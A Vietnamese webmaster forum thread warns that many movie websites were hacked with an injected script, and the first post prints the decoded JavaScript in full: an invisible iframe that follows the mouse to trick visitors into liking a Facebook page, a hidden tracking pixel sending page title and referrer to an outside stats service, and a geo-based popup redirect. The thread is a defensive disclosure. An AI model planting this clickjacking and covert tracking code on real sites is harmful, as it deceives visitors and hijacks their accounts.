Hiển thị kết quả từ 1 đến 6 / 6
  1. #1
    Tham gia
    10-07-2007
    Location
    Nha Trang
    Bài viết
    261
    Like
    5
    Thanked 9 Times in 7 Posts

    Cần chú ý ! [Cảnh báo] Có rất nhiều website phim bị hack và chèn mã

    Chào mọi người,
    Thẳng vào vấn đề, gần đây mình detect được rất nhiều website (chủ yếu là website phim) bị hack và chèn mã js như sau:

    Mã: <script src="http://jquery.im/jquery.geo.js"></script>
    Đại loại, giải mã ra như sau:
    Code:
    var xtime=500;
    var fbdiv='efb657817028';
    var d=document;
    function fb657817028(pos)
    	{
    	var e=d.getElementById(fbdiv);
    	var xpos=6;
    	if(e===null)
    		{
    		var div=d.createElement('div');
    		div.id=fbdiv;
    		div.style.cssText='position:absolute;
    		overflow:hidden;
    		height:'+xpos+'px;
    		width:6px;
    		z-index:10000;
    		top:1px;
    		left:0px;
    		filter:alpha(opacity=0);
    		 -moz-opacity:0.0;
    		 -khtml-opacity: 0.0;
    		 opacity: 0.0;
    		';
    		div.innerHTML='<iframe scrolling="no" frameborder="0" id="'+fbdiv+'frame" allowtransparency="true" style="border:none;
    		overflow:hidden;
    		width:150x;
    		height:123px;
    		left:-60px;
    		position:absolute;
    		opacity:0;
    		" src="https://www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2Ftagfuns&amp;
    		width&amp;
    		layout=standard&amp;
    		action=recommend&amp;
    		show_faces=true&amp;
    		share=true&amp;
    		height=80&amp;
    		appId=435166099921490"></iframe>';
    		d.body.appendChild(div)
    	}
    	e=d.getElementById(fbdiv);
    	var ss=document.compatMode=="CSS1Compat"?document.documentElement:document.body;
    	if(document.event)
    		{
    		e.style.top=window.event.y-(xpos-1)+ss.scrollTop+"px";
    		e.style.left=window.event.x-(xpos-1)+ss.scrollLeft+"px"
    	}
    	else
    		{
    		e.style.top=pos.pageY-(xpos-1)+"px";
    		e.style.left=pos.pageX-(xpos-1)+"px"
    	}
    	d.onmousemove=''
    }
    function load_like()
    	{
    	var t=window.setInterval(function()
    		{
    		d.onmousemove=fb657817028
    	}
    	,xtime)
    }
    function load_clike()
    	{
    	if(d.cookie.indexOf("fbcookie")>=0)
    		{
    	}
    	else
    		{
    		var now=new Date().getTime();
    		var now=Math.round((new Date(now)).getTime()/1000)+(6*3600);
    		d.cookie="fbcookie=true;
    		expires="+now+";
    		path=/";
    		var t=window.setInterval(function()
    			{
    			d.onmousemove=fb657817028
    		}
    		,xtime)
    	}
    }
    var s=document.createElement('script');
    s.type='text/javascript';
    s.src='https://www.facebook.com/imike3';
    s.async=true;
    s.onload=function()
    	{
    	load_like()
    };
    s.onerror=function()
    	{
    };
    d.getElementsByTagName('head')[0].appendChild(s);
    var dimg=d.createElement("img");
    dimg.src="http://whos.amung.us/swidget/geostats.png?t="+document.title+"&f="+document.referrer+"";
    dimg.style.display="none";
    d.body.appendChild(dimg);
    Code:
    function ip_callback(o)
    	{
    	var country;
    	country=o.countryCode;
    	if(country!=''&&country=='US')
    		{
    		make_pop()
    	}
    }
    function pop_open()
    	{
    	var url="http://phim.so/"+(Math.floor(Math.random()*25000)+1);
    	window.open(url,'_blank');
    	var now=Math.round((new Date()).getTime()/1000)+(6*3600);
    	document.cookie="popz="+now+";
    	expires="+now+";
    	path=/";
    	document.body.setAttribute("onclick","")
    }
    function make_pop()
    	{
    	if(document.cookie.indexOf("popz")<=0)
    		{
    		document.body.setAttribute("onclick","pop_open()")
    	}
    }
    function get_geo()
    	{
    	var s=document.createElement('script');
    	s.src='https://smart-ip.net/geoip-json?callback=ip_callback';
    	document.getElementsByTagName('head')[0].appendChild(s)
    }
    get_geo();
    Đoạn script này có tác dụng:
    1. Tự động like fanpage http://www.facebook.com/tagfuns
    2. Có liên quan gì đó đến facebook: https://www.facebook.com/imike3
    3. Ghi nhận tracking bằng amung qua ID: geostats (http://whos.amung.us/stats/readers/geostats/)
    4. Dựa vào GeoIP (https://smart-ip.net/geoip-json?callback=ip_callback), nếu country là US thì bật popup mở ra trang http://phim.so (cũng là hay.im)

    Bộ script này được chèn vào rất rất nhiều website, khi mình đang viết bài này thì lượng online của whos amung là hơn 2k5.

    Hiện tại, việc whois domain phim.so, jquery.im và hay.im đều đã bị giả thông tin hết rồi, nhưng trước đây mình có từng đụng đến mớ thông tin thật, và cũng đã từng cố gắng liên lạc với "chủ nhân" nhưng không thành công, mình sẽ buộc phải public nếu như tình hình không khả quan hơn.

    Những ai đang quản lý những website dưới đây hãy kiểm tra lại toàn bộ code của mình nhé:

    wphim.com
    phimdata.com
    kenh88.com
    superphim.com
    phimonlineforum.com
    bomtan.org
    zingphim.net
    mfvii.com

    và một số website khác, xem thêm tại: http://whos.amung.us/stats/readers/geostats/

    Mọi người cùng phân tích, điều tra nhé.
    Trao đổi backlink PM Y!M: cafetinhban_lequi
    Quote Quote

  2. Thành viên Like bài viết này:


  3. #2
    Tham gia
    10-07-2007
    Location
    Nha Trang
    Bài viết
    261
    Like
    5
    Thanked 9 Times in 7 Posts
    Mình bổ sung thêm vài thông tin:
    Thời gian chèn code: sáng ngày 20-11, tầm 8h
    Dựa vào thông tin trên whos.amung rất khớp: http://whos.amung.us/stats/history/geostats/
    Trao đổi backlink PM Y!M: cafetinhban_lequi

  4. #3
    Tham gia
    17-01-2008
    Bài viết
    322
    Like
    4
    Thanked 21 Times in 20 Posts
    có tool nào check mã độc javasctip online ko nhỉ

  5. #4
    Tham gia
    25-01-2011
    Location
    Hà Nội
    Bài viết
    1,851
    Like
    55
    Thanked 171 Times in 131 Posts
    Xtrem đầy lỗi còn wp chắc bị lỗi ttheme

  6. #5
    Tham gia
    23-09-2013
    Bài viết
    222
    Like
    2
    Thanked 83 Times in 26 Posts
    chắc mấy bác này dùng code share nên dính mã này thôi

  7. #6
    Tham gia
    12-10-2013
    Location
    SÀI GÒN
    Bài viết
    463
    Like
    27
    Thanked 35 Times in 34 Posts
    Quote Được gửi bởi rongvietnam123 View Post
    chắc mấy bác này dùng code share nên dính mã này thôi
    code share để chèn vào làm mã hack là gì thế?
    Cuộc sống tươi đẹp.

Bookmarks

Quy định

  • Bạn không thể tạo chủ đề mới
  • Bạn không thể trả lời bài viết
  • Bạn không thể gửi file đính kèm
  • Bạn không thể sửa bài viết của mình
  •